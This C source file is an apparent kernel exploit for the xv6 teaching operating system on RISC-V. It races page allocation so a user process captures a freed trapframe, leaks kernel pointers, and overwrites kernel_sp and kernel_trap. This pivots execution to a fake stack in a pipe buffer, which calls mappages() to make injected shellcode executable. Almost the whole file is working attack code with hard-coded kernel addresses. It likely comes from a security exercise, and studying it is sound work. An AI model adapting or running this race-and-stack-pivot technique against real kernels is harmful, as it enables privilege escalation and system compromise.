#include "kernel/types.h"
#include "kernel/stat.h"
#include "user/user.h"

// Print a string followed by a newline. `s` must be a string literal: it is
// pasted next to "\n" and the result is used as the printf format string, so
// it also must not contain a '%' conversion.
#define puts(s) printf(s "\n")

// The two ends of a pipe, usable either as the raw array that pipe() fills in
// or by name. fds[0] and recv_fd are the same int; so are fds[1] and send_fd.
typedef union {
  int fds[2];
  struct {
    int recv_fd; // end this process read()s from (aliases fds[0])
    int send_fd; // end this process write()s to (aliases fds[1])
  };
} pipe_t;

// value exchanged by handshake() so that parent() and child() advance in step
#define HANDSHAKE_MAGIC 0xdeadbeef
// byte offset inside the pipe's data buffer where the fake kernel stack
// starts; it leaves 32 + 80 + 8 = 120 bytes before the end of the 512-byte
// buffer (NOTE(review): the meaning of the 32/80/8 split is not shown here --
// presumably the sizes of the frames laid out on the fake stack; confirm)
#define PIPE_SP         (512 - (32 + 80 + 8))
// size of a page (4KB)
#define PAGE_SIZE       4096
// address of the wonky pipe's `struct pipe` in kernel memory. Like the other
// hard-coded addresses below it is presumably only valid for one specific
// kernel build -- TODO confirm before reusing
#define WONKY_PIPE_ADDR 0x87f43000
// address at which we will remap the wonky pipe buffer
#define SHELLCODE_ADDR  0xdead0000
// address of the kernel page table (child() checks it against
// trapframe->kernel_satp before doing anything else)
#define KERNEL_PT       0x87fff000
// new trapframe->kernel_sp value: the kernel address of pipe->data[PIPE_SP],
// i.e. the start of the fake stack (0x18 skips struct pipe's spinlock member)
#define KERNEL_SP       (WONKY_PIPE_ADDR + PIPE_SP + 0x18)
// new trapframe->kernel_trap value
#define KERNEL_TRAP     0x8000525c
// address of mappages()+4
#define MAPPAGES_ADDR   0x80001086

// page-table-entry flag bits; only PTE_R, PTE_W and PTE_X are used in this
// file (as the permission value loaded in vuln())
#define PTE_V (1L << 0) // valid
#define PTE_R (1L << 1) // readable
#define PTE_W (1L << 2) // writable
#define PTE_X (1L << 3) // executable
#define PTE_U (1L << 4) // user can access
// physical address -> PTE page-number field: drop the 12-bit page offset and
// shift the page number into place starting at bit 10. `pa` is parenthesized
// so that an expression argument is converted as a whole, not just its first
// operand.
#define PA2PTE(pa) ((((uint64)(pa)) >> 12) << 10)

// this macro marks variables as unused, so that the compiler
// doesn't complain
#define U(x) ((void)(x))

// Initial contents of the wonky pipe's data buffer. It starts with the
// shellcode bytes from ../shcd.c (any bytes that initializer does not cover
// are zero). main() then stores 64-bit fake-stack values at PIPE_SP + 24 and
// PIPE_SP + 104 and writes the whole array into the pipe with one write().
// NOTE(review): the shellcode must be short enough not to reach those slots
// (byte 416 onward), and 512 presumably matches the kernel's PIPESIZE so a
// single write fills the buffer -- confirm both.
static char pipe_data[512] = {
// this is the shellcode compiled and converted into an array of bytes
#include "../shcd.c"
};

// Body of every process parent() forks: load fixed values into argument
// registers a1-a5, then spin forever so those registers keep holding them.
// Per the comment below, they are meant as arguments for `mappages`.
// Presumably a1-a4 line up with its va/size/pa/perm parameters and a5 carries
// the kernel page table; TODO confirm against the code reached through
// MAPPAGES_ADDR / KERNEL_TRAP. Never returns.
static void vuln(void) {
  // setup the registers for our call to `mappages`
  register uint64 a1 asm("a1") = SHELLCODE_ADDR;
  register uint64 a2 asm("a2") = PAGE_SIZE;
  register uint64 a3 asm("a3") = WONKY_PIPE_ADDR;
  register uint64 a4 asm("a4") = PTE_R | PTE_X | PTE_W;
  register uint64 a5 asm("a5") = KERNEL_PT;

  // GCC only guarantees that a local register variable occupies its named
  // register when it is an operand of an extended asm statement; otherwise
  // the assignments above are dead stores the optimizer may drop. The empty
  // asm keeps every value live in its register on each iteration (and also
  // marks the variables as used).
  while (1)
    __asm__ __volatile__("" : : "r"(a1), "r"(a2), "r"(a3), "r"(a4), "r"(a5));
}

// Exchange HANDSHAKE_MAGIC with the process at the other end of `p`. Both
// parent() and child() call this at the top of every round, so neither side
// starts a round before the other is ready.
//
// Returns 1 if the peer sent the expected magic, 0 if it sent something else,
// and -1 if the write or the read failed or transferred fewer bytes than
// expected.
static int handshake(pipe_t* p) {
  int rc;
  uint64 my_magic, other_magic;

  my_magic = HANDSHAKE_MAGIC;
  rc = write(p->send_fd, &my_magic, sizeof(my_magic));
  if (rc != (int)sizeof(my_magic))
    return -1;

  // NOTE compare as int: `rc < sizeof(...)` converts rc to an unsigned type,
  // so a -1 error return would slip through and the uninitialized
  // other_magic would be compared below
  rc = read(p->recv_fd, &other_magic, sizeof(other_magic));
  if (rc != (int)sizeof(other_magic))
    return -1;

  return my_magic == other_magic;
}

// Child side of the race. Each round it:
//   1. synchronizes with parent() via handshake(),
//   2. grows this process by one page with sbrk() ("race kalloc()"),
//   3. reads from the pipe the pid of the process parent() just forked,
//   4. checks whether the new page looks like a trapframe: alloc[2]
//      (trapframe->kernel_trap) must hold a value in 0x80000000-0x800fffff.
// On a miss it kills that process, gives the page back and tries again.
// On a hit it prints the leak, checks the hard-coded KERNEL_PT against
// alloc[0] (trapframe->kernel_satp), waits for a keypress and then keeps
// overwriting kernel_sp/kernel_trap forever.
//
// Returns -1 on any failure; does not return on success.
static int child(pipe_t* p) {
  int rc, chld;
  char in;
  char* mem;
  volatile uint64* alloc;

  while (1) {
    rc = handshake(p);
    if (rc <= 0) {
      puts("child: could not synchronize with parent (pipe error)");
      return -1;
    }

    // try to race kalloc() by allocating memory to the process
    mem = sbrk(PAGE_SIZE);
    if (mem == (char*)-1) {
      puts("child: could not allocate memory");
      return -1;
    }
    alloc = (volatile uint64*)mem;

    // read the pid of the process the parent just forked; anything short of
    // a full int (e.g. 0 bytes at EOF) would leave chld uninitialized and
    // send kill() a garbage pid
    rc = read(p->recv_fd, &chld, sizeof(chld));
    if (rc != (int)sizeof(chld)) {
      puts("child: could not communicate with parent");
      return -1;
    }

    // check if the race was successful
    // NOTE alloc[2] == trapframe->kernel_trap
    if ((alloc[2] & (uint64)~0xfffff) == 0x80000000)
      break;

    // if it wasn't successful, kill the forked process and free the memory
    kill(chld);
    sbrk(-PAGE_SIZE);
  }

  printf("leaked pointer %p (value is %p)!\n", alloc, alloc[2]);
  // sanity check that the hard-coded KERNEL_PT matches the page table the
  // kernel actually uses (this should never fail)
  // NOTE alloc[0] == trapframe->kernel_satp
  if ((alloc[0] << 12) != KERNEL_PT) {
    puts("kernel pt address mismatch!");
    return -1;
  }

  // pause until the user presses a key before starting the overwrite loop
  puts("press any key to continue...");
  if (read(0, &in, sizeof(in)) < 0) {
    puts("could not get input from user");
    return -1;
  }

  // overwrite trapframe->kernel_trap (alloc[2]) and trapframe->kernel_sp (alloc[1])
  while (1) {
    alloc[1] = KERNEL_SP;
    alloc[2] = KERNEL_TRAP;
  }
}

// Parent side of the race. Each round it synchronizes with child() via
// handshake() and forks a process that runs vuln() ("race kalloc() of
// trapframe"). It then sends that process's pid to child() and waits for it
// to exit; child() kills it when the race misses.
//
// Returns -1 on failure, after killing and reaping the forked process if it
// may still be running.
static int parent(pipe_t* p) {
  int rc, status, pid;
  int chld = -1; // pid of a forked vuln() process that may still be alive

  while (1) {
    rc = handshake(p);
    if (rc <= 0) {
      puts("parent: could not synchronize with child (pipe error)");
      goto out;
    }

    // race kalloc() of trapframe
    chld = fork();
    if (chld < 0) {
      puts("parent: could not fork");
      goto out;
    }

    if (chld == 0)
      vuln(); // if we're the forked process, go do the infinite loop
    else {
      // otherwise, tell the child its pid and wait for it to terminate
      printf("spawned new child %d\n", chld);
      rc = write(p->send_fd, &chld, sizeof(chld));
      if (rc != (int)sizeof(chld)) {
        puts("parent: could not communicate with child");
        goto out;
      }
      // wait() may also reap the process running child(); only forget chld
      // once it is the one reaped, so the cleanup below still kills it
      // otherwise (and never kills a stale, already-reaped pid)
      if (wait(&status) == chld)
        chld = -1;
    }
  }

out:
  if (chld > 0) {
    kill(chld);
    while ((pid = wait(&status)) >= 0 && pid != chld)
      ;
  }
  return -1;
}

#define SPOFF(off) ((uint64*)&pipe_data[PIPE_SP + (off)])

int main(int argc, char *argv[])
{
  int rc, chld;
  pipe_t p_chld, p_prnt, p_data;

  // the wonky pipe :D
  rc = pipe(p_data.fds);
  if (rc < 0) {
    puts("could not create data pipe");
    goto out;
  }

  // setup the fake stack
  *SPOFF(24) = MAPPAGES_ADDR;
  // NOTE we need to add 0x18 to skip over the spinlock member in
  // the pipe struct
  // 
  // struct pipe {
  //   struct spinlock lock; <-- we need to skip this (24 bytes = 0x18 bytes)
  //   char data[PIPESIZE];  <-- this is where we're writing our fake stack and shellcode
  //   uint nread;     // number of bytes read
  //   uint nwrite;    // number of bytes written
  //   int readopen;   // read fd is still open
  //   int writeopen;  // write fd is still open
  // };
  //
  *SPOFF(32 + 72) = SHELLCODE_ADDR + 0x18;

  // write fake stack + shellcode to the pipe's buffer
  rc = write(p_data.send_fd, pipe_data, sizeof(pipe_data));
  if (rc < 0) {
    puts("could not write data to data pipe");
    goto out;
  }

  rc = pipe(p_chld.fds);
  if (rc < 0) {
    puts("could not create child pipe");
    goto out;
  }
  
  rc = pipe(p_prnt.fds);
  if (rc < 0) {
    puts("could not create parent pipe");
    goto out;
  }
  
  rc = chld = fork();
  if (rc < 0) {
    puts("could not fork");
    goto out;
  }

  if (rc == 0) {
    close(p_chld.send_fd);
    close(p_prnt.recv_fd);
    p_chld.send_fd = p_prnt.send_fd;
    rc = child(&p_chld);
  }
  else {
    close(p_prnt.send_fd);
    close(p_chld.recv_fd);
    p_prnt.send_fd = p_chld.send_fd;
    rc = parent(&p_prnt);
  }

out:
  exit(rc);
}
